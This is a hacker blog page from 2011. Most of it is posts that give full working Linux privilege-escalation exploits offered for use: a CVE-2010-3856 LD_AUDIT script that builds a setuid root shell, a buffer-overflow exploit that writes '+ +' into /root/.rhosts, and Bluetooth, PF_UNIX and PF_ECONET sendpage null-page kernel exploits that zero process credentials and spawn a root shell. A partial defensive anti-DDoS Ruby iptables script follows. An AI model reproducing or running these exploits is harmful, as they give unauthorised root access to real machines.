Help pay for xds lawyer fees.
LR

Linux CVE-2010-3856 (Audit) – deadbyte version

Posted on 19th October 2011 in Codes, Exploits

Just thought it is worthy of posting…

#!/bin/bash
# CVE-2010-3856
# Author: deadbyte

OUTPUT=/etc/ld.so.preload

MASK=`umask`
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
if [ ! -f $OUTPUT ]; then
echo "System does not appear to be vuln"
exit 0
fi
echo -n > $OUTPUT
umask $MASK

cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv, char **envp) {
char *args[] = { "/bin/bash", NULL };
setuid(geteuid());
setgid(getegid());
execve(args[0], args, envp);
perror("execve failed");
return 0;
}
EOF
gcc sh.c -o sh

cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>

uid_t getuid (void) {
chown("$PWD/sh", 0, 0);
chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh

Have fun..

comments: 0 » tags:

Linux tmpfile-rhosts() exploit Info/PoC Code (.c)

Posted on 18th October 2011 in Codes, Exploits

Here is a rather interesting exploit, based on bugs in tmpfile and rhosts, verymuch still not used much but, could be contructed to work very easily thru a netcat like session… i wont go into that but, i will post the exploit
code wich is kinda like a small backdoor, i dunno, you be the judge here… it shuld be called temp rhosts() bug but, it seems abit trivial to exploit so ill leave it upto you for the name!

// MAIN exploit.c file..READ the notes as it shows you how
// to use this properly!! :?
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16
/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/
int main(int argc, char **argv) {
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <garbage>n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vul */
printf("before: tmpfile = %sn", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("nafter: tmpfile = %sn", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL) {
fprintf(stderr, "error opening %s: %sn", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

int main(int argc, char **argv) {
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <garbage>n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vuln */
printf("before: tmpfile = %sn", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("nafter: tmpfile = %sn", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL) {
fprintf(stderr, "- error opening %s: %sn", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv) {
u_long addr;
register int i;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +t# ";
if (argc <= 1) {
fprintf(stderr,"Usage: %s <offset> [try 310-330]n",argv[0]);
exit(ERROR);
}
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %sn",buf, VULPROG, VULFILE);
printf("[+] Overflowing tmpaddr to point to %p, check %s after.nn",addr, VULFILE);
system(mainbuf);
return 0;
}

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv) {
u_long addr;
register int I;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +t# ";
if (argc <= 1) {
fprintf(stderr, "Usage: %s <offset> [try 310-330]n", argv[0]);
exit(ERROR);
}
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
/* reverse byte order (on a little endian system) */
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %sn",buf, VULPROG, VULFILE);
printf("Overflowing tmpaddr to point to %p, check %s after.nn",addr, VULFILE);
system(mainbuf);
return 0;
}

Enjoy!

comments: 0 » tags:

PF_UNIX sendpage() 2010 2.6.18.el5-dev/2.6.18-164.el5xen/2.6.X depends on socket existing.. this is in 3 parts here, PF_UNIX,PF_ECONET and PF_BLUETOOTH Linux working local root exploits (.c)

Posted on 13th October 2011 in Codes, Exploits

Ok 2 variants,since an idiot 1337sht.com ppl leaked things they dont yet even know how to make BEST use of but anyhow.. here, some gifts… and one is special :< unf is goin to b patched or is patched..depends on what you also do, but mmap is a big trick , b sure to also remmber the UNIX socket prblem, can mmap null page and workable with bsd ;) Yes its patched but, only with latest free-bsd update .. hehe...nasty!

Code for Bluetouth socketx, with fixed mmap...a shitty old vuln wich was not really leaked onto exploit places like 1337shit.com or whatever they call themself... lamahs i call them

/* Bluetooth Sendpage socket() local root exploit
 * Linux 2.6.18-128.el5
 * Linux 2.6.9-89.EL
 * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 – 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 – 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 – 1);
#else
    task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()  /* use this in 2011! (xd) */

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
// ye dunno why the other idjits are still tryin to nullpage mmap..useless can do it easier like..
    if ((addr=mmap(0×0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = ‘\xff’;
    addr[1] = ‘\x24′;
    addr[2] = ‘\x25′;
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = ‘\xff’;
    addr[1] = ‘\x25′;
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = ‘\x3f’;
    addr[1] = ‘\xe0′;
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = ‘\x63′;
    addr[5] = ‘\xff’;
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = ‘\x7f’;
    addr[9] = ‘\xe9′;
    addr[10] = ‘\x03′;
    addr[11] = ‘\xa6′;
    addr[12] = ‘\x4e’;
    addr[13] = ‘\x80′;
    addr[14] = ‘\x04′;
    addr[15] = ‘\x20′;
#endif
#endif
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Code for PF_UNIX sendpage() socketx (my version):

/* UNIX socket() local root exploit (OS Portable version)
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

NOTE: that can be added to BSD easily...

Finally, the Econet,wich is a fail usually but has worked on a few *select* 2011 (very nice) kernels..and prooven.

/* PF_ECONET sendpage-raw local root exploit 2011
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
if((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_ECONET,SOCK_RAW,0)) == -1) { //my baby
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Again, enjoy the *right* made stuff , not taking credit for but, definately fixing some things and adjusting some releases wich seem to now be many forkbombs... i dislike that, either rls your pvts, wich may be ok for even ONE kern, as i am, forsure after a OpenVZ kernel-local, and some kind of OpenVZ attacker in general..interested, email me here/pm whatever.
I can b found on efnet as xd-- / #haxnet or Undernet nickname xds #zombie channel
I look forward to any new things, atm, i can safely say upto 2010, i have covered in ONE neat setup of only 4 exploits..wich is ok.
So, am trying to make a perfect BSD-Linux-x86_64-OpenVZ payload style scanner, any influence is welcome..

Note: i notice this site has HUGE ranks, so if your stuff got here, your damn lucky buddy!
xd

comments: 3 » tags:

Anti DDoS Ruby Scripting wich uses IPtables and IP6Tables by xd

Posted on 11th October 2011 in Papers

Ok well, this was once for oldish firewalls,or can be used for csf and apf, easily enough and, i will makesure to show this in the codes :) .
My ones, are tested and working fine atm on a inet4 and inet6 box, i am still in testing but, to get it to startup right was already a task!
It is bewtiful to run, just make aa.rb and put the code in there, then save it, and chmod +x aa.rb then ruby aa.rb ,it will daemonise,and showup in ps aux as ruby aa.rb ,and, you can premake the logfile ( i would, touch aa.log aa6.log;chmod 700 aa.rb aa6.rb aa.log aa6.log

OK…lets go… For standard Iptables on Ipv4 this will grab an attacking/bruter like attacks, and simply block individual IPs, so, it is safer than blocking CIDR’s…and then, setup a policy, its easy, so you can use -F (flush) safely when you need to..

Here is aa.rb

#aa.rb
#!/usr/bin/env ruby
# Attack v1 (xd-mod) - A Threaded (D)aemonisied (D)DoS-Deflate alternative written in Ruby for IPtables/IP6tables
# this is the Iptables version,and you can also use this for ipv6 simply make a copy of this file,and change this line:
# FIREWALL = "/usr/bin/ip6tables" ,and thats it!
# To revert to the old script wich relys on lame method using -d flag on csf/apf ,wich sucks and tested this, you add:
# FIREWALL = "csf"  ## or apf
# then below..
# `#{FIREWALL} -I INPUT -s #{ip} -j DROP` change this to: `#{FIREWALL} -d #{ip}`
# Thats it! Enjoy the modified anti-ddos tool wich is now finally working :)  BY #Haxnet@EFnet xd--
require 'logger'

class Attack
        # The number of concurent connections per IP
        CONNECTION_LIMIT = 10          ##can be upto 30 safely
        # The frequency (in seconds) that Attack checks the current connections
        FREQUENCY = 30
        # Iptables mod here (makesure to use FULL pathway to iptables/ip6tables for aa6.rb)
        FIREWALL = "/usr/bin/iptables" ##and for ipv6 script aa6.rb make this "/usr/bin/ip6tables" ,easy!
        # Connection checks and bans are logged here.
        LOG_FILE = "aa.log"
        # IP Whitelist
        WHITELIST = %w{ 127.0.0.1 }    ##makesure to allow for your own net here (hosters/dedis/shells/vps)
def initialize
        @connections = `netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n`   ##nice n neat ;?
        @log = Logger.new(LOG_FILE)
        daemonize  ##ok lets damonise nice and silently so we dont make bash hang
        loop do
        run
        sleep(FREQUENCY)
        end
        end
        ## Iptables mod here
        def check(connections)
        connections.each { |connection|
        conn, ip = connection.split
        if conn.to_i > CONNECTION_LIMIT and not WHITELIST.include? ip
        `#{FIREWALL} -I INPUT -s #{ip} -j DROP`
        @log.info "[IPT] Dropped -> #{ip} with -> #{conn} connections .."
        end
        }
        end
def run
        Thread.new {
        check @connections
        @log.info "[IPT] Checked connections at -> #{Time.now} .."
        }.join
        end
        protected
        def daemonize
        exit if fork
        Process.setsid
        exit if fork
        Dir.chdir "/"
        File.umask 0000
        STDIN.reopen "/dev/null"
        STDOUT.reopen "/dev/null", "a"
        STDERR.reopen STDOUT
        trap("TERM") {
        exit
        }
        end
end
Attack.new

…Here,the aa6.rb IP6Tables setup :) here ;

##aa6.rb to run alongside aa.rb
## AntiDDoS Ruby IP6tables mod by xd
require 'logger'

class Attack
        # The number of concurent connections per IP
        CONNECTION_LIMIT = 10                ##can be upto 30 safely
        # The frequency (in seconds) that Attack checks current connections
        FREQUENCY = 30
        # Ip6tables mod here (makesure to use FULL pathway to ip6tables)
